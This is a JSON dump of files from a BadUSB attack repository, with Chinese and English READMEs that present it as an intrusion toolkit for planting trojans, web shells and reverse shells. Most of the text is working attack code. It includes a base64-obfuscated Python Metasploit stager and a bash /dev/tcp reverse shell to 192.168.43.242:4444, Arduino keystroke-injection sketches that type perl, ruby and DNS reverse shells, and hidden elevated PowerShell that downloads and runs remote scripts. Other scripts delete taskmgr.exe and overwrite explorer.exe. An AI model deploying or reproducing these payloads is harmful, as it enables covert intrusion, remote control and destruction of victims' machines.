kernel32.dll CreateThread), (jQhd @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]))).Invoke([IntPtr]::Zero,0,$zpx,[IntPtr]::Zero,0,[IntPtr]::Zero)\n[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((yI6 kernel32.dll WaitForSingleObject), (jQhd @([IntPtr], [Int32]))).Invoke($sSYR,0xffffffff) | Out-Null\n"
  },
  {
    "path": "MSF_Trojanlinkage/shell.py",
    "content": "import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzE5Mi4xNjguNDMuMjQyJyw0NDQ0KSkKCQlicmVhawoJZXhjZXB0OgoJCXRpbWUuc2xlZXAoNSkKbD1zdHJ1Y3QudW5wYWNrKCc+SScscy5yZWN2KDQpKVswXQpkPXMucmVjdihsKQp3aGlsZSBsZW4oZCk8bDoKCWQrPXMucmVjdihsLWxlbihkKSkKZXhlYyhkLHsncyc6c30pCg==')))"
  },
  {
    "path": "MSF_Trojanlinkage/shell.sh",
    "content": "0<&202-;exec 202<>/dev/tcp/192.168.43.242/4444;sh <&202 >&202 2>&202"
  },
  {
    "path": "OSX_Built-inReverseShell/OSX_SystemReverseConnection (dns_shell).ino",
    "content": "\nvoid setup()\n{\n  delay(5000);\n  run(\"terminal\");\n  delay(3000);\n  Keyboard.print(\"nslookup -querytype=txt INPUT0 |\");\n  delay(200);\n  Keyboard.print(\" INPUT0 |\");\n  delay(200);\n  Keyboard.print(\"grep text | cut -d \\\" \\\" -f3-\");\n  delay(200);\n  Keyboard.print(\" | tr -d \\\"\\\\\\\"\\\" | base64 -D\");\n  delay(200);\n  Keyboard.println(\" | /bin/bash\");\n  \n}\n\nvoid loop()\n{\n   \n}\n\nvoid run(char *SomeCommand){\n  \n  Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI);\n  Keyboard.set_key1(KEY_SPACE);\n  Keyboard.send_now();\n\n  delay(500);\n  Keyboard.set_modifier(0);\n  Keyboard.set_key1(0);\n  Keyboard.send_now();\n\n  Keyboard.print(SomeCommand);\n  Keyboard.set_key1(KEY_ENTER);\n  Keyboard.send_now();\n\n  Keyboard.set_key1(0);\n  Keyboard.send_now();\n}\n\n"
  },
  {
    "path": "OSX_Built-inReverseShell/OSX_SystemReverseConnection (perl_shell).ino",
    "content": "\n\nvoid setup()\n{\n  delay(5000);\n  run(\"terminal\");\n  delay(3000);\n  Keyboard.print(\"perl -MIO -e '$p=fork;exit,if\");\n  delay(100);\n  Keyboard.print(\"($p);$c=new IO::Socket::INET\");\n  delay(100);\n  Keyboard.print(\"(PeerAddr,\\\"INPUT0:INPUT1\\\"\");\n  delay(100);\n  Keyboard.print(\");STDIN->fdopen($c,r);$~->\");\n  delay(100);\n  Keyboard.print(\"fdopen($c,w);system$_ \");\n  delay(100);\n  Keyboard.println(\"while<>;'\");\n  \n    \n}\n\nvoid loop()\n{\n   \n}\n\nvoid run(char *SomeCommand){\n  \n  Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI);\n  Keyboard.set_key1(KEY_SPACE);\n  Keyboard.send_now();\n\n  delay(500);\n  Keyboard.set_modifier(0);\n  Keyboard.set_key1(0);\n  Keyboard.send_now();\n\n  Keyboard.print(SomeCommand);\n  Keyboard.set_key1(KEY_ENTER);\n  Keyboard.send_now();\n\n  Keyboard.set_key1(0);\n  Keyboard.send_now();\n}\n\n"
  },
  {
    "path": "OSX_Built-inReverseShell/OSX_SystemReverseConnection (ruby_shell).ino",
    "content": "\nvoid setup()\n{\n  \n    delay(5000);\n  run(\"terminal\");\n  delay(3000);\n  Keyboard.print(\"ruby -rsocket -e 'exit if fork;\");\n  delay(100);\n  Keyboard.print(\"c=TCPSocket.new\");\n  delay(100);\n  Keyboard.print(\"(\\\"INPUT0\\\",\\\"INPUT1\\\"\");\n  delay(100);\n  Keyboard.print(\");while(cmd=c.gets);IO.popen\");\n  delay(100);\n  Keyboard.println(\"(cmd,\\\"r\\\"){|io|c.print io.read}end'\");\n  delay(100);\n    \n}\n\nvoid loop()\n{\n   \n}\n\nvoid run(char *SomeCommand){\n  \n  Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI);\n  Keyboard.set_key1(KEY_SPACE);\n  Keyboard.send_now();\n\n  delay(500);\n  Keyboard.set_modifier(0);\n  Keyboard.set_key1(0);\n  Keyboard.send_now();\n\n  Keyboard.print(SomeCommand);\n  Keyboard.set_key1(KEY_ENTER);\n  Keyboard.send_now();\n\n  Keyboard.set_key1(0);\n  Keyboard.send_now();\n}\n\n\n"
  },
  {
    "path": "PSL_FullScreen-HACKED/FullScreenHackedv0/FullScreenHackedv/FullScreenHackedv.ino",
    "content": "void setup() {//初始化\n  Keyboard.begin();//开始键盘通讯 \n  delay(5000);//延时\n  Keyboard.press(KEY_LEFT_GUI);//win键 \n  delay(500); \n  Keyboard.press('r');//r键 \n  delay(500); \n  Keyboard.release(KEY_LEFT_GUI);\n  Keyboard.release('r');\n  Keyboard.press(KEY_CAPS_LOCK);\n  Keyboard.release(KEY_CAPS_LOCK);\n  delay(500); \n  Keyboard.println(\"POWERSHELL -NOP\");\n  delay(1000);\n  Keyboard.println(\"START-PROCESS -fILEpATH POWERSHELL \\\" -NOP -W HIDDEN -C SET-eXECUTIONpOLICY rEMOTEsIGNED -FORCE;CD $ENV:PUBLIC;(nEW-oBJECT sYSTEM.nET.wEBcLIENT).dOWNLOADfILE(\\'HTTP://FQ.WC.LT/UP/1459435782.PS1\\',\\'C:\\\\USERS\\\\PUBLIC\\\\GET.PS1\\');./GET.PS1;EXIT\\\" -vERB RUNAS;EXIT\");\n  delay(500);\n  Keyboard.press(KEY_CAPS_LOCK);\n  Keyboard.release(KEY_CAPS_LOCK);\n  Keyboard.end();//结束键盘通讯\n}\nvoid loop()//循环\n{\n  Keyboard.release(KEY_LEFT_ALT);\n  Keyboard.press(KEY_LEFT_ALT);\n  Keyboard.print('y');\n  Keyboard.release(KEY_LEFT_ALT);\n  Keyboard.release(KEY_LEFT_ALT);\n  Keyboard.release(KEY_LEFT_ALT);\n  Keyboard.release(KEY_LEFT_ALT);\n  delay(50);\n}\n"
  },
  {
    "path": "PSL_FullScreen-HACKED/FullScreenHackedv0/get.ps1",
    "content": "cd \\;\n(New-Object System.Net.Webclient).DownloadFile(\"http://image.cnsc8.com/tupian_201501/Big_Pic/nRz13KeMr5.jpg\",\"c:\\x.jpg\");\nStart-Sleep -Seconds 5;\nreg add \"HKEY_CURRENT_USER\\Control Panel\\Desktop\" /v Wallpaper /d c:\\x.jpg /f;RunDll32.exe USER32.DLL,UpdatePerUserSystemParameters;\ntaskkill /F /IM explorer.exe;\nStart-Sleep -Seconds 5;\nreg add \"HKEY_CURRENT_USER\\Control Panel\\Desktop\" /v Wallpaper /d c:\\x.jpg /f;RunDll32.exe USER32.DLL,UpdatePerUserSystemParameters;\ntaskkill /F /IM explorer.exe;\nRemove-Item get.ps1;\nexit;"
  },
  {
    "path": "PSL_FullScreen-HACKED/FullScreenHackedv2/FullScreenHackedv2.ino",
    "content": "void setup() {\n  Keyboard.begin();\n  delay(5000);\n  Keyboard.press(KEY_LEFT_GUI);\n  delay(500); \n  Keyboard.press('r');\n  Keyboard.press(KEY_CAPS_LOCK);\n  Keyboard.release(KEY_CAPS_LOCK);\n  delay(500); \n  Keyboard.release(KEY_LEFT_GUI);\n  Keyboard.release('r');\n  delay(500); \n  Keyboard.println(\"POWERSHELL -W HIDDEN -NOP -C \\\"IEX(nEW-oBJECT nET.wEBcLIENT).dOWNLOADsTRING('HTTP://PAN.PLYZ.NET/D.ASP?U=1369254435&P=sns.PS1')\\\";EXIT\");\n  Keyboard.press(KEY_CAPS_LOCK);\n  Keyboard.release(KEY_CAPS_LOCK);\n  Keyboard.end();\n}\nvoid loop()\n{\n}\n"
  },
  {
    "path": "PSL_FullScreen-HACKED/FullScreenHackedv2/wall.ps1",
    "content": "$down=\"$env:userprofile\\Local Settings\\Application Data\\Microsoft\\Wallpaper1.bmp\"\n(New-Object System.Net.WebClient).DownloadFile('http://7xrn7f.com1.z0.glb.clouddn.com/16-6-2/70005991.jpg',$down);\nstart-sleep 5\ncmd /c \"reg add `\"HKEY_CURRENT_USER\\Control Panel\\Desktop`\" /v `\"WallpaperStyle`\" /t reg_sz /d 2 /f\"\ncmd /c \"reg add `\"HKEY_CURRENT_USER\\Control Panel\\Desktop`\" /v Wallpaper /d `\"%userProfile%\\Local Settings\\Application Data\\Microsoft\\Wallpaper1.bmp`\" /f\"\ncmd /c \"reg add `\"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System`\" /v Wallpaper /d `\"%userProfile%\\Local Settings\\Application Data\\Microsoft\\Wallpaper1.bmp`\" /f\"\ncmd /c \"reg add `\"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System`\" /v WallpaperStyle /d \"2\" /f\"\ncmd /c \"RunDll32.exe USER32.DLL,UpdatePerUserSystemParameters\"\ncmd /c \"gpupdate /force\"\ncmd /c \"takeown /f c:\\windows\\explorer.exe\"\ncmd /c \"echo y `|cacls c:\\windows\\explorer.exe /g administrator:f\"\ncmd /c \"icacls c:\\windows\\explorer.exe /grant administrator:f\"\ncmd /c \"takeown /f C:\\Windows\\System32\\taskmgr.exe\"\ncmd /c \"echo y `|cacls C:\\Windows\\System32\\taskmgr.exe /g administrator:f\"\ncmd /c \"icacls c:\\windows\\System32\\taskmgr.exe /grant administrator:f\"\ncmd /c \"del /f /q C:\\Windows\\System32\\taskmgr.exe\"\ncmd /c \"taskkill /f /im explorer.exe&echo 123>c:\\windows\\explorer.exe\""
  },
  {
    "path": "PSL_FullScreen-HACKED/FullScreenHackedv3[慎用]/FullScreenHackedv3/FullScreenHackedv3.ino",
    "content": "void setup(){\n  Keyboard.begin();//开始键盘通讯 \n  delay(5000);//延时\n  Keyboard.press(KEY_LEFT_GUI);//win键 \n  delay(500); \n  Keyboard.press('r');//r键 \n  delay(500); \n  Keyboard.release(KEY_LEFT_GUI);\n  Keyboard.release('r');\n  Keyboard.press(KEY_CAPS_LOCK);\n  Keyboard.release(KEY_CAPS_LOCK);\n  delay(500); \n  Keyboard.println(\"POWERSHELL -NOP\");\n  Keyboard.println();\n  delay(1000);\n  Keyboard.println(\"START-PROCESS -fILEpATH POWERSHELL \\\" -NOP -W HIDDEN -C SET-eXECUTIONpOLICY rEMOTEsIGNED -FORCE;IEX(nEW-OBJECT sYSTEM.nET.wEBcLIENT).dOWNLOADsTRING(`'HTTP://PAN.PLYZ.NET/D.ASP?U=1235108351&P=GET.PS1`');EXIT\\\" -vERB RUNAS;EXIT\");\n  Keyboard.press(KEY_CAPS_LOCK);\n  Keyboard.release(KEY_CAPS_LOCK);\n  Keyboard.end();//结束键盘通讯 \n}\nvoid loop()//循环\n{\n  //bypass uac 绕过UAC,这一段不会用的不要用,否则后果自负\n  //Keyboard.press(KEY_LEFT_ALT);\n  //Keyboard.print('y');\n  //Keyboard.release(KEY_LEFT_ALT);\n}\n"
  },
  {
    "path": "PSL_FullScreen-HACKED/FullScreenHackedv3[慎用]/get.ps1",
    "content": "$down=\"$env:userprofile\\Local Settings\\Application Data\\Microsoft\\Wallpaper1.bmp\"\n(New-Object System.Net.WebClient).DownloadFile('http://7xrn7f.com1.z0.glb.clouddn.com/16-6-2/70005991.jpg',$down);\nstart-sleep 5\ncmd /c \"reg add `\"HKEY_CURRENT_USER\\Control Panel\\Desktop`\" /v `\"WallpaperStyle`\" /t reg_sz /d 2 /f\"\ncmd /c \"reg add `\"HKEY_CURRENT_USER\\Control Panel\\Desktop`\" /v Wallpaper /d `\"%userProfile%\\Local Settings\\Application Data\\Microsoft\\Wallpaper1.bmp`\" /f\"\ncmd /c \"reg add `\"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System`\" /v Wallpaper /d `\"%userProfile%\\Local Settings\\Application Data\\Microsoft\\Wallpaper1.bmp`\" /f\"\ncmd /c \"reg add `\"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System`\" /v WallpaperStyle /d \"2\" /f\"\ncmd /c \"RunDll32.exe USER32.DLL,UpdatePerUserSystemParameters\"\ncmd /c \"gpupdate /force\"\ncmd /c \"takeown /f c:\\windows\\explorer.exe\"\ncmd /c \"echo y `|cacls c:\\windows\\explorer.exe /g administrator:f\"\ncmd /c \"icacls c:\\windows\\explorer.exe /grant administrator:f\"\ncmd /c \"takeown /f C:\\Windows\\System32\\taskmgr.exe\"\ncmd /c \"echo y `|cacls C:\\Windows\\System32\\taskmgr.exe /g administrator:f\"\ncmd /c \"icacls c:\\windows\\System32\\taskmgr.exe /grant administrator:f\"\ncmd /c \"del /f /q C:\\Windows\\System32\\taskmgr.exe\"\ncmd /c \"taskkill /f /im explorer.exe&echo \"h\">c:\\windows\\explorer.exe\""
  },
  {
    "path": "README.cn.md",
    "content": "# BadUSB\n![](https://img.shields.io/badge/BadUSB-fsociety-red)<br>\n该项目利用USB协议上的漏洞，通过更改USB的内部固件，在接入USB接口后，模拟外置鼠标、键盘的功能，以此来使目标主机执行已经精心构造好的命令。<br>\n\n![68747470733a2f2f696d616765732e67697465652e636f6d2f75706c6f6164732f696d616765732f323032312f303230322f3231333933325f36653462313436665f323332333636362e6a706567](https://user-images.githubusercontent.com/39434325/112772972-75a8e900-9066-11eb-9948-895916bf18ef.jpg)<br>\n#### QQ交流群：775942445\n#### 加微信-进入交流群：wwy18795980897\n\n### 前言\n和大多数人一样，最初见到BadUSB是在美剧《黑客军团》中，是fsociety组织常用的工具之一，无论是向服务器下载木马控制被害者主机，还是达琳在停车场帅气的扔出大量USB钓鱼，BadUSB都是功不可没的物理武器之一。  \n![黑客军团](https://upload-images.jianshu.io/upload_images/11477676-71045c807dac0df6.png?imageMogr2/auto-orient/strip|imageView2/2/w/554/format/webp)<br>\n\n### 优势\n在USB攻击领域，很多年前常用的是老式USB病毒（自动运行）autorun.inf，但文件现在已经会被杀毒软件轻易地查杀，与autorun.inf不同，BadUSB是利用了USB协议上的漏洞，通过更改USB的内部固件，在正常的USB接口接入后，模拟外置鼠标、键盘的功能，以此来使目标主机执行已经精心构造好的命令。在此过程中不会引起杀毒软件、防火墙的一丝怀疑。而且因为是在固件级别的应用，U盘格式化根本无法阻止其内部代码的执行。  \n![Leonardo_Arduino](https://upload-images.jianshu.io/upload_images/11477676-4347a3e41663dde6.jpg?imageMogr2/auto-orient/strip|imageView2/2/w/554/format/webp)<br>\n我最新欢的是Leonardo_Arduino板子，因为同样是对USB的利用，Windows、Linux、MAC等各类操作系统默认存在leonardo_Arduino的USB接口驱动，不必联网下载专用的驱动程序。此外，向BadUSB烧录的程序极为简单，大部分是对键盘、鼠标按键进行模拟，上手较为容易。  \nBadUSB也是社会工程学的一个典型示例，它极大地利用了人们的好奇心，在路边捡到的USB，估计九成以上的人们都想看看里面有什么东西，而当你插入个人主机或公司内网，攻击就很难再停止下来了。<br>\n![BadUSB钓鱼](https://upload-images.jianshu.io/upload_images/11477676-3d1f812778254931.png?imageMogr2/auto-orient/strip|imageView2/2/w/554/format/webp)<br>\n\n### 教程\n[具体步骤请移步至简书](https://www.jianshu.com/p/2b2b1dab85fe) <br>\n![操作步骤](https://upload-images.jianshu.io/upload_images/11477676-390539861bec703c.png?imageMogr2/auto-orient/strip|imageView2/2/w/554/format/webp)<br>\n\n### 目录导图<br>\n\n     BadUSB\n     │  LICENSE\n     │  README.en.md\n     │  README.md\n     │  \n     ├─BlueScreen蓝屏\n     │      BlueScreen蓝屏1（DOS）.ino\n     │      BlueScreen蓝屏2（DOS）.ino\n     │      BlueScreen蓝屏3（DOS）.ino\n     │      xp和win7的蓝屏代码（DOS攻击）.ino\n     │      延迟蓝屏（DOS）.ino\n     │      注册表写入致使开机蓝屏通用（DOS）.ino\n     │      注册表写入致使开机蓝屏（DOS）.ino\n     │      \n     ├─CobaltStrike木马联动\n     │  │  BitsAdmin木马执行（与CS联动）.ino\n     │  │  Pl木马执行（与CS联动）.ino\n     │  │  PSL木马执行（与CS联动）.ino\n     │  │  PY木马执行（与CS联动）.ino\n     │  │  Regsvr32木马执行（与CS联动）.ino\n     │  │  \n     │  ├─CobaltStrike各种语言的Payload\n     │  │      payload.bin\n     │  │      payload.c\n     │  │      payload.cs\n     │  │      payload.java\n     │  │      payload.pl\n     │  │      payload.ps1\n     │  │      payload.py\n     │  │      payload.rb\n     │  │      payload.sct\n     │  │      payload.txt\n     │  │      payload.vba\n     │  │      \n     │  └─CounterStrike木马制作教程\n     │          CounterStrike.jpg\n     │          CounterStrike木马制作教程.png\n     │          \n     ├─DNS劫持\n     │      DOS命令设置多个DNS（DNS劫持）.ino\n     │      PSL命令设置多个DNS（DNS劫持）.ino\n     │      \n     ├─Linux内置反向Shell\n     │      Linux内置的反向Shell（BashShell）.ino\n     │      Linux反向Shell（PerlShell）.ino\n     │      Linux反向Shell（代码执行）.ino\n     │      \n     ├─MSF木马联动\n     │      shell.apk\n     │      shell.asp\n     │      shell.aspx\n     │      shell.elf\n     │      shell.exe\n     │      shell.jar\n     │      shell.jsp\n     │      shell.macho\n     │      shell.php\n     │      shell.pl\n     │      shell.psl\n     │      shell.py\n     │      shell.sh\n     │      shell.war\n     │      Shell木马生成配置.txt\n     │      \n     ├─OSX内置反向Shell\n     │      osx系统反向连接（dns_shell）.ino\n     │      osx系统反向连接（perl_shell）.ino\n     │      osx系统反向连接（ruby_shell）.ino\n     │      \n     ├─PSL全屏HACKED画面\n     │  ├─FullScreenHackedv0\n     │  │  │  get.ps1\n     │  │  │  \n     │  │  └─FullScreenHackedv\n     │  │          FullScreenHackedv.ino\n     │  │          \n     │  ├─FullScreenHackedv2\n     │  │      FullScreenHackedv2.ino\n     │  │      wall.ps1\n     │  │      \n     │  └─FullScreenHackedv3[慎用]\n     │      │  get.ps1\n     │      │  \n     │      └─FullScreenHackedv3\n     │              FullScreenHackedv3.ino\n     │              \n     ├─Ubuntu信息搜集\n     │      Ubuntu信息搜集到TXT文件（信息）.ino\n     │      Ubuntu的基本终端命令（显示）.ino\n     │      \n     ├─WIFI密码获取\n     │      WIFI密码导出（工具）.ino\n     │      Wifi密码捕获（工具）.ino\n     │      \n     ├─WIFI连接木马\n     │      强迫连接指定WIFI并下载psl木马运行（木马入侵）.ino\n     │      \n     ├─代码原理解读\n     │      arduino按键代码基础.ino\n     │      MSF木马制作教程.txt\n     │      关于setup和loop方法的说明.txt\n     │      \n     ├─木马下载器\n     │  ├─CERTUTIL木马下载器（木马攻击）代码\n     │  │      链接服务器msf木马certutil下载版.ino\n     │  │      \n     │  ├─FTP木马下载器（木马攻击）代码\n     │  │      FTP下载netcat并反向连接shell（木马攻击）.ino\n     │  │      \n     │  ├─JAVA木马写入（木马攻击）代码\n     │  │      java木马写入（目标环境可运行Java）.ino\n     │  │      server.java\n     │  │      \n     │  ├─PSL木马下载器（木马攻击）代码\n     │  │      powershell下载服务器木马.ino\n     │  │      psl木马下载器1（木马攻击）.ino\n     │  │      psl木马下载器2（木马攻击）.ino\n     │  │      psl木马下载器3通用（木马攻击）.ino\n     │  │      psl木马下载器4通用（木马攻击）.ino\n     │  │      psl木马下载器win&linux通用（木马攻击）.ino\n     │  │      psl木马写入并反弹（木马攻击）.ino\n     │  │      下载psl木马并二次执行（木马攻击）.ino\n     │  │      链接服务器msf木马psl下载版.ino\n     │  │      链接服务器psl下载版.ino\n     │  │      \n     │  └─PY木马下载器（木马攻击）代码\n     │          PyShellServer.py\n     │          Py木马写入（目标环境可运行Python）.ino\n     │          \n     ├─添加用户并开启服务\n     │      添加用户并开启3389（工具）.ino\n     │      添加用户并开启ftp（工具）.ino\n     │      \n     ├─特定功能代码\n     │      Alt_F4循环关闭窗口后关机（工具）.ino\n     │      Shift后门（工具）.ino\n     │      单纯改变所有用户密码（恶作剧项）.ino\n     │      启动PSL远程连接功能（工具）.ino\n     │      强制删除360各项进程（工具）.ino\n     │      强制执行关机ShutDown命令（工具）.ino\n     │      截屏并发送指定FTP地址（工具）.ino\n     │      打开对方445端口（内网渗透）.ino\n     │      打开指定网页（工具）.ino\n     │      更改所用账户密码+关闭系统进程+蓝屏（工具）.ino\n     │      添加用户代码（工具）.ino\n     │      简简单单关个机（恶作剧项）.ino\n     │      隐藏CMD窗口（显示）.ino\n     │      鼠标不停移动（工具）.ino\n     │      \n     ├─网站一句话入侵代码\n     │      aspx一句话木马写入（网站服务器版本-过狗过D盾）.ino\n     │      aspx一句话木马写入（网站服务器版本） .ino\n     │      asp一句话木马写入（网站服务器版本-Script Encoder 加密）.ino\n     │      asp一句话木马写入（网站服务器版本-动态解码）.ino\n     │      asp一句话木马写入（网站服务器版本） .ino\n     │      jsp一句话木马写入（jsp网站服务器使用）.ino\n     │      jsp木马写入（jsp网站服务器使用非一句话）.ino\n     │      php木马写入（php网站服务器使用-异或绕过）.ino\n     │      php木马写入（php网站服务器使用-类绕过）.ino\n     │      php木马写入（php网站服务器使用）.ino\n     │      \n     └─运行U盘内的程序_扩大入侵范围\n         ├─UdiskRun\n         │      UdiskRun.ino\n         │      \n         ├─UdiskRunv2\n         │      UdiskRunv2.ino\n         │      \n         └─UdiskRunv3\n                UdiskRunv3.ino\n\n\n### 演示<br>\n[更改所用账户密码+关闭系统进程+蓝屏测试](https://www.yuque.com/u12074055/gzgwfh/dg804t)<br>\n![演示](https://upload-images.jianshu.io/upload_images/11477676-31390e8446540ca3.jpg?imageMogr2/auto-orient/strip|imageView2/2/w/554/format/webp)<br>\n\n### 进阶<br>\n网站一句话入侵<br>\nBadUSB&MSF联动<br>\nBadUSB&CS联动<br>\nWIFI局域网入侵<br>\n运行U盘内的程序_扩大入侵范围<br>\n![进阶](https://upload-images.jianshu.io/upload_images/11477676-cc6c47da713ac2e2.jpg?imageMogr2/auto-orient/strip|imageView2/2/w/554/format/webp)<br>\n\n### 解疑<br>\n你可以在微信、QQ群、Gitee、Gihub上留言，团队看到后会尽快回复。\n![常见问题和错误](https://upload-images.jianshu.io/upload_images/11477676-0c90a8004d5e5420.jpg?imageMogr2/auto-orient/strip|imageView2/2/w/554/format/webp)<br>\n\n### 扩展<br>\n实现特定功能<br>\n其他实现BadUSB功能的板子（需要另安驱动，不是特别推荐）<br>\n![扩展](https://upload-images.jianshu.io/upload_images/11477676-bba7de72abd2072d.jpg?imageMogr2/auto-orient/strip|imageView2/2/w/554/format/webp)<br>\n\n### 更新<br>\n###### 2021.02.06更新代码，部分是从其他爱好者哪里搜寻的开源代码，部分是与MSF联动的方法流程以及我认为比较好用的Arduino Leonardo基础按键代码<br>\n###### 2021.02.14更新代码，从其他优秀项目中获得启发，加入了CobaltStrike联动的木马、DNS劫持代码、linux和osx内置反向shell、WIFI连接木马、WIFI密码获取、网站一句话入侵代码、psl全屏hacked画面、运行U盘内的程序_扩大入侵范围以及实现很多实用功能的代码，情人节快乐！<br>\n![更新](https://upload-images.jianshu.io/upload_images/11477676-a54932b08d3ef2da.jpg?imageMogr2/auto-orient/strip|imageView2/2/w/554/format/webp)<br>\n\n### 项目链接<br>\n\n代码已上传至GitHub及Gitee，**跪求star**，其他项目也挺好玩的， **继续跪求Star**。<br>\n\n **GitHub：** https://github.com/wangwei39120157028/BadUSB<br>\n \n **Gitee：**  https://gitee.com/wwy2018/BadUSB<br>\n"
  },
  {
    "path": "README.md",
    "content": "# BadUSB\n![](https://img.shields.io/badge/BadUSB-fsociety-red)<br>\nThis project takes advantage of the loophole in USB protocol. By changing the internal firmware of USB, after accessing the USB interface, it simulates the functions of external mouse and keyboard, so as to make the target host execute the well-constructed commands.<br>\n\n![68747470733a2f2f696d616765732e67697465652e636f6d2f75706c6f6164732f696d616765732f323032312f303230322f3231333933325f36653462313436665f323332333636362e6a706567](https://user-images.githubusercontent.com/39434325/112772972-75a8e900-9066-11eb-9948-895916bf18ef.jpg)<br>\n#### QQ：775942445<br>\n#### WeChat：wwy18795980897<br>\n\n### Introduction<br>\nLike most of us, BadUSB was first introduced in Mr. Robot and is one of the FSociety's most popular tools. Whether it's downloading a Trojan to a server to control a victim's host, or Darlene throwing a bunch of USB phishing devices in a parking lot, BadUSB is one of the most important physical weapons.  <br>\n![黑客军团](https://upload-images.jianshu.io/upload_images/11477676-71045c807dac0df6.png?imageMogr2/auto-orient/strip|imageView2/2/w/554/format/webp)<br>\n\n### Advantage<br>\nIs commonly used in the field of USB attack, many years ago old USB virus (automatic) autorun. Inf, but the file is now will be antivirus software easily detected, and the autorun. J inf, BadUSB is to use a loophole in the USB protocol, by changing the interior of the USB firmware, after normal USB port access, to simulate the external function of the mouse, keyboard, in order to make the target host execution has been carefully constructed good command. In this process will not cause anti-virus software, a trace of suspicion firewall. And because it's at the firmware level, USB flash drive formatting can't prevent the execution of its internal code.  <br>\n![Leonardo_Arduino](https://upload-images.jianshu.io/upload_images/11477676-4347a3e41663dde6.jpg?imageMogr2/auto-orient/strip|imageView2/2/w/554/format/webp)<br>\n\nMy latest favorite is leonardo_Arduino board, because the same is the use of USB, Windows, Linux, Mac and other operating systems default existence leonardo_Arduino USB interface driver, do not have to network download dedicated driver. In addition, to BADUSB burning procedures are very simple, most of the keyboard, mouse keys for simulation, easy to get started.  <br>\nBadUSB is also a good example of social engineering. It plays on people's curiosity. It's estimated that more than 90% of people will want to see what's inside a USB they pick up on the side of the road.  <br><br>\n![BadUSB钓鱼](https://upload-images.jianshu.io/upload_images/11477676-3d1f812778254931.png?imageMogr2/auto-orient/strip|imageView2/2/w/554/format/webp)<br>\n\n### Tutorial  <br>\n[Video address](https://www.yuque.com/u12074055/cpuceb/qicml3) <br>\nVideo: Introduction to BsdUSB Compiler<br>\nVideo: BadUSB driver installation and code writing<br>\nVideo: BadUSB basic operation<br>\n[For detailed steps, please go to the brief book](https://www.jianshu.com/p/2b2b1dab85fe) <br>\n![操作步骤](https://upload-images.jianshu.io/upload_images/11477676-390539861bec703c.png?imageMogr2/auto-orient/strip|imageView2/2/w/554/format/webp)<br>\n\n### Directory<br>\n    \n    BadUSB\n     │  LICENSE\n     │  README.en.md\n     │  README.md\n     │  \n     ├─AddUser_StartService\n     │      AddUser_Enable3389(tools).ino\n     │      AddUser_EnableFTP(tools).ino\n     │      \n     ├─BlueScreen\n     │      BlueScreen1(DOS).ino\n     │      BlueScreen2(DOS).ino\n     │      BlueScreen3(DOS).ino\n     │      BlueScreen_xp_win7(DOS).ino\n     │      DelayedBlueScreen (DOS).ino\n     │      RegistryWriteBlueScreen (DOS).ino\n     │      RegistryWriteBlueScreenGeneralUse (DOS).ino\n     │      \n     ├─CobaltStrike_Trojanlinkage\n     │  │  Bitsadmin_TrojanExecution (LinkageWithCS).ino\n     │  │  Pl_TrojanExecution (LinkageWithCS).ino\n     │  │  PSL_TrojanExecution (LinkageWithCS).ino\n     │  │  PY_TrojanExecution (LinkageWithCS).ino\n     │  │  Regsvr32_TrojanExecution (LinkageWithCS).ino\n     │  │  \n     │  ├─CobaltStrike_Payload\n     │  │      payload.bin\n     │  │      payload.c\n     │  │      payload.cs\n     │  │      payload.java\n     │  │      payload.pl\n     │  │      payload.ps1\n     │  │      payload.py\n     │  │      payload.rb\n     │  │      payload.sct\n     │  │      payload.txt\n     │  │      payload.vba\n     │  │      \n     │  └─CounterStrikeTrojanTutorial\n     │          CounterStrike.jpg\n     │          CounterStrikeTutorial.png\n     │          \n     ├─CodePrincipleInterpretation\n     │      ArduinoKeyCodeBase.ino\n     │      InstructionsOn_setup_loop_Methods.txt\n     │      MSF_TrojanMakingTutorial.txt\n     │      \n     ├─DNSHijack\n     │      DOS_CommandSetMultipleDNS(DNSHijack).ino\n     │      PSL_CommandSetMultipleDNS(DNSHijack).ino\n     │      \n     ├─Linux_Built-inReverseShell\n     │      LinuxReverseShell (CodeExecution).ino\n     │      LinuxReverseShell(BashShell).ino\n     │      LinuxReverseShell(PerlShell).ino\n     │      \n     ├─MSF_Trojanlinkage\n     │      shell.apk\n     │      shell.asp\n     │      shell.aspx\n     │      shell.elf\n     │      shell.exe\n     │      shell.jar\n     │      shell.jsp\n     │      shell.macho\n     │      shell.php\n     │      shell.pl\n     │      shell.psl\n     │      shell.py\n     │      shell.sh\n     │      shell.war\n     │      Shell_TrojanGenerationConfiguration.txt\n     │      \n     ├─OSX_Built-inReverseShell\n     │      OSX_SystemReverseConnection (dns_shell).ino\n     │      OSX_SystemReverseConnection (perl_shell).ino\n     │      OSX_SystemReverseConnection (ruby_shell).ino\n     │      \n     ├─PSL_FullScreen-HACKED\n     │  ├─FullScreenHackedv0\n     │  │  │  get.ps1\n     │  │  │  \n     │  │  └─FullScreenHackedv\n     │  │          FullScreenHackedv.ino\n     │  │          \n     │  ├─FullScreenHackedv2\n     │  │      FullScreenHackedv2.ino\n     │  │      wall.ps1\n     │  │      \n     │  └─FullScreenHackedv3\n     │      │  get.ps1\n     │      │  \n     │      └─FullScreenHackedv3\n     │              FullScreenHackedv3.ino\n     │              \n     ├─RunProgramOn_UDrive_ExpandScopeOfIntrusion\n     │  ├─UdiskRun\n     │  │      UdiskRun.ino\n     │  │      \n     │  ├─UdiskRunv2\n     │  │      UdiskRunv2.ino\n     │  │      \n     │  └─UdiskRunv3\n     │          UdiskRunv3.ino\n     │          \n     ├─Site_AWord_IntrusionCode\n     │      AspSentenceTrojanWrite(webServerVersion).ino\n     │      